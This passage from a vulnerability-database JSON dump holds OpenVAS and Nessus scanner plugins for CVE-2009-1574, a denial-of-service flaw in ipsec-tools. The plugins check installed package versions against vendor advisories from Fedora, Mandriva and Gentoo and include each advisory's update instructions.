USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nMinor version update from upstream fixing remote DoS.\nChangeLog:\n\n* Tue May 5 2009 Tomas Mraz - 0.7.2-1\n- Update to a new upstream version\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update ipsec-tools' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-4298\";\ntag_summary = \"The remote host is missing an update to ipsec-tools\nannounced via advisory FEDORA-2009-4298.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63992\");\n script_cve_id(\"CVE-2009-1574\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-20 00:17:15 +0200 (Wed, 20 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Core 10 FEDORA-2009-4298 (ipsec-tools)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=497990\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"ipsec-tools\", rpm:\"ipsec-tools~0.7.2~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ipsec-tools-debuginfo\", rpm:\"ipsec-tools-debuginfo~0.7.2~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:07", "bulletinFamily": "scanner", "description": "The remote host is missing an update to ipsec-tools\nannounced via advisory FEDORA-2009-4394.", "modified": "2017-07-10T00:00:00", "published": "2009-05-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63994", "id": "OPENVAS:63994", "title": "Fedora Core 11 FEDORA-2009-4394 (ipsec-tools)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_4394.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-4394 (ipsec-tools)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nMinor version update from upstream fixing remote DoS.\nChangeLog:\n\n* Tue May 5 2009 Tomas Mraz - 0.7.2-1\n- Update to a new upstream version\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update ipsec-tools' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-4394\";\ntag_summary = \"The remote host is missing an update to ipsec-tools\nannounced via advisory FEDORA-2009-4394.\";\n\n\n\nif(description)\n{\n script_id(63994);\n script_cve_id(\"CVE-2009-1574\");\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-20 00:17:15 +0200 (Wed, 20 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Core 11 FEDORA-2009-4394 (ipsec-tools)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=497990\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"ipsec-tools\", rpm:\"ipsec-tools~0.7.2~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ipsec-tools-debuginfo\", rpm:\"ipsec-tools-debuginfo~0.7.2~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:17", "bulletinFamily": "scanner", "description": "The remote host is missing an update to ipsec-tools\nannounced via advisory MDVSA-2009:112-1.", "modified": "2017-07-06T00:00:00", "published": "2009-12-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66364", "id": "OPENVAS:66364", "title": "Mandriva Security Advisory MDVSA-2009:112-1 (ipsec-tools)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_112_1.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:112-1 (ipsec-tools)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"racoon/isakmp_frag.c in ipsec-tools before 0.7.2 allows remote\nattackers to cause a denial of service (crash) via crafted fragmented\npackets without a payload, which triggers a NULL pointer dereference\n(CVE-2009-1574).\n\nUpdated packages are available that brings ipsec-tools to version\n0.7.2 for Mandriva Linux 2008.1/2009.0/2009.1 which provides numerous\nbugfixes over the previous 0.7.1 version, and also corrects this\nissue. ipsec-tools for Mandriva Linux Corporate Server 4 has been\npatched to address this issue.\n\nAdditionally the flex package required for building ipsec-tools has\nbeen fixed due to ipsec-tools build problems and is also available\nwith this update.\n\nUpdate:\n\nPackages for 2008.0 are being provided due to extended support for\nCorporate products.\n\nAffected: 2008.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:112-1\";\ntag_summary = \"The remote host is missing an update to ipsec-tools\nannounced via advisory MDVSA-2009:112-1.\";\n\n \n\nif(description)\n{\n script_id(66364);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-10 00:23:54 +0100 (Thu, 10 Dec 2009)\");\n script_cve_id(\"CVE-2009-1574\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Mandriva Security Advisory MDVSA-2009:112-1 (ipsec-tools)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"flex\", rpm:\"flex~2.5.33~2.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ipsec-tools\", rpm:\"ipsec-tools~0.7.2~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec0\", rpm:\"libipsec0~0.7.2~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec-devel\", rpm:\"libipsec-devel~0.7.2~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec0\", rpm:\"lib64ipsec0~0.7.2~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec-devel\", rpm:\"lib64ipsec-devel~0.7.2~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-02T21:13:53", "bulletinFamily": "scanner", "description": "This host is installed with IPSec Tools for Linux and is prone\n to Denial of Service Vulnerability.", "modified": "2016-12-29T00:00:00", "published": "2009-05-13T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=800708", "id": "OPENVAS:800708", "title": "IPSec Tools Denial of Service Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ipsec-tools_dos_vuln.nasl 4869 2016-12-29 11:01:45Z teissa $\n#\n# IPSec Tools Denial of Service Vulnerability\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the attacker cause denial if service.\n\n Impact level: Application/System\";\n\ntag_affected = \"IPsec Tools version prior to 0.7.2\";\ntag_insight = \"This flaw is due to a NULL pointer dereference caused when the file\n 'racoon/isakmp_frag.c' processes fragmented packets without any payload.\";\ntag_solution = \"Upgrade to the latest version 0.7.2\n http://ipsec-tools.sourceforge.net\";\ntag_summary = \"This host is installed with IPSec Tools for Linux and is prone\n to Denial of Service Vulnerability.\";\n\nif(description)\n{\n script_id(800708);\n script_version(\"$Revision: 4869 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-29 12:01:45 +0100 (Thu, 29 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-13 10:01:19 +0200 (Wed, 13 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cve_id(\"CVE-2009-1574\");\n script_name(\"IPSec Tools Denial of Service Vulnerability\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=497990\");\n script_xref(name : \"URL\" , value : \"http://www.openwall.com/lists/oss-security/2009/05/04/3\");\n script_xref(name : \"URL\" , value : \"http://www.openwall.com/lists/oss-security/2009/04/29/6\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_ipsec-tools_detect.nasl\");\n script_require_keys(\"IPSec/Tools/Ver\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"impact\" , value : tag_impact);\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nipsecVer = get_kb_item(\"IPSec/Tools/Ver\");\nif(ipsecVer == NULL){\n exit(0);\n}\n\n# Grep for IPSec Tools version prior to 0.7.2\nif(version_is_less(version:ipsecVer, test_version:\"0.7.2\")){\n security_message(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:56:46", "bulletinFamily": "scanner", "description": "The remote host is missing an update to ipsec-tools\nannounced via advisory MDVSA-2009:112.", "modified": "2017-07-06T00:00:00", "published": "2009-06-05T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64135", "id": "OPENVAS:64135", "title": "Mandrake Security Advisory MDVSA-2009:112 (ipsec-tools)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: mdksa_2009_112.nasl 6573 2017-07-06 13:10:50Z cfischer $\n# Description: Auto-generated from advisory MDVSA-2009:112 (ipsec-tools)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"racoon/isakmp_frag.c in ipsec-tools before 0.7.2 allows remote\nattackers to cause a denial of service (crash) via crafted fragmented\npackets without a payload, which triggers a NULL pointer dereference\n(CVE-2009-1574).\n\nUpdated packages are available that brings ipsec-tools to version\n0.7.2 for Mandriva Linux 2008.1/2009.0/2009.1 which provides numerous\nbugfixes over the previous 0.7.1 version, and also corrects this\nissue. ipsec-tools for Mandriva Linux Corporate Server 4 has been\npatched to address this issue.\n\nAdditionally the flex package required for building ipsec-tools has\nbeen fixed due to ipsec-tools build problems and is also available\nwith this update.\n\nAffected: 2008.1, 2009.0, 2009.1, Corporate 4.0\";\ntag_solution = \"To upgrade automatically use MandrakeUpdate or urpmi. The verification\nof md5 checksums and GPG signatures is performed automatically for you.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=MDVSA-2009:112\";\ntag_summary = \"The remote host is missing an update to ipsec-tools\nannounced via advisory MDVSA-2009:112.\";\n\n \n\nif(description)\n{\n script_id(64135);\n script_version(\"$Revision: 6573 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 15:10:50 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-05 18:04:08 +0200 (Fri, 05 Jun 2009)\");\n script_cve_id(\"CVE-2009-1574\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Mandrake Security Advisory MDVSA-2009:112 (ipsec-tools)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Mandrake Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mandriva_mandrake_linux\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"flex\", rpm:\"flex~2.5.33~3.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ipsec-tools\", rpm:\"ipsec-tools~0.7.2~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec0\", rpm:\"libipsec0~0.7.2~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec-devel\", rpm:\"libipsec-devel~0.7.2~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec0\", rpm:\"lib64ipsec0~0.7.2~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec-devel\", rpm:\"lib64ipsec-devel~0.7.2~0.1mdv2008.1\", rls:\"MNDK_2008.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"flex\", rpm:\"flex~2.5.35~2.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ipsec-tools\", rpm:\"ipsec-tools~0.7.2~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec0\", rpm:\"libipsec0~0.7.2~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec-devel\", rpm:\"libipsec-devel~0.7.2~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec0\", rpm:\"lib64ipsec0~0.7.2~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec-devel\", rpm:\"lib64ipsec-devel~0.7.2~0.1mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"flex\", rpm:\"flex~2.5.35~3.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ipsec-tools\", rpm:\"ipsec-tools~0.7.2~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec0\", rpm:\"libipsec0~0.7.2~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec-devel\", rpm:\"libipsec-devel~0.7.2~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec0\", rpm:\"lib64ipsec0~0.7.2~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec-devel\", rpm:\"lib64ipsec-devel~0.7.2~0.1mdv2009.1\", rls:\"MNDK_2009.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"ipsec-tools\", rpm:\"ipsec-tools~0.6.5~2.3.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec0\", rpm:\"libipsec0~0.6.5~2.3.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libipsec0-devel\", rpm:\"libipsec0-devel~0.6.5~2.3.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec0\", rpm:\"lib64ipsec0~0.6.5~2.3.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"lib64ipsec0-devel\", rpm:\"lib64ipsec0-devel~0.6.5~2.3.20060mlcs4\", rls:\"MNDK_4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:40:19", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200905-03.", "modified": "2018-04-06T00:00:00", "published": "2009-05-25T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064042", "id": "OPENVAS:136141256231064042", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200905-03 (ipsec-tools)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple errors in the IPSec Tools racoon daemon might allow remote\n attackers to cause a Denial of Service.\";\ntag_solution = \"All IPSec Tools users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-firewall/ipsec-tools-0.7.2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200905-03\nhttp://bugs.gentoo.org/show_bug.cgi?id=267135\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200905-03.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64042\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-25 20:59:33 +0200 (Mon, 25 May 2009)\");\n script_cve_id(\"CVE-2009-1574\", \"CVE-2009-1632\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Gentoo Security Advisory GLSA 200905-03 (ipsec-tools)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"net-firewall/ipsec-tools\", unaffected: make_list(\"ge 0.7.2\"), vulnerable: make_list(\"lt 0.7.2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2020-04-01T01:09:12", "bulletinFamily": "scanner", "description": "racoon/isakmp_frag.c in ipsec-tools before 0.7.2 allows remote\nattackers to cause a denial of service (crash) via crafted fragmented\npackets without a payload, which triggers a NULL pointer dereference\n(CVE-2009-1574).\n\nUpdated packages are available that brings ipsec-tools to version\n0.7.2 for Mandriva Linux 2008.1/2009.0/2009.1 which provides numerous\nbugfixes over the previous 0.7.1 version, and also corrects this\nissue. ipsec-tools for Mandriva Linux Corporate Server 4 has been\npatched to address this issue.\n\nAdditionally the flex package required for building ipsec-tools has\nbeen fixed due to ipsec-tools build problems and is also available\nwith this update.\n\nUpdate :\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers", "modified": "2020-04-02T00:00:00", "id": "MANDRIVA_MDVSA-2009-112.NASL", "href": "https://www.tenable.com/plugins/nessus/38767", "published": "2009-05-14T00:00:00", "title": "Mandriva Linux Security Advisory : ipsec-tools (MDVSA-2009:112-1)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2009:112. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38767);\n script_version (\"1.16\");\n script_cvs_date(\"Date: 2019/08/02 13:32:51\");\n\n script_cve_id(\"CVE-2009-1574\");\n script_bugtraq_id(34765);\n script_xref(name:\"MDVSA\", value:\"2009:112-1\");\n\n script_name(english:\"Mandriva Linux Security Advisory : ipsec-tools (MDVSA-2009:112-1)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"racoon/isakmp_frag.c in ipsec-tools before 0.7.2 allows remote\nattackers to cause a denial of service (crash) via crafted fragmented\npackets without a payload, which triggers a NULL pointer dereference\n(CVE-2009-1574).\n\nUpdated packages are available that brings ipsec-tools to version\n0.7.2 for Mandriva Linux 2008.1/2009.0/2009.1 which provides numerous\nbugfixes over the previous 0.7.1 version, and also corrects this\nissue. ipsec-tools for Mandriva Linux Corporate Server 4 has been\npatched to address this issue.\n\nAdditionally the flex package required for building ipsec-tools has\nbeen fixed due to ipsec-tools build problems and is also available\nwith this update.\n\nUpdate :\n\nPackages for 2008.0 are provided for Corporate Desktop 2008.0\ncustomers\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n 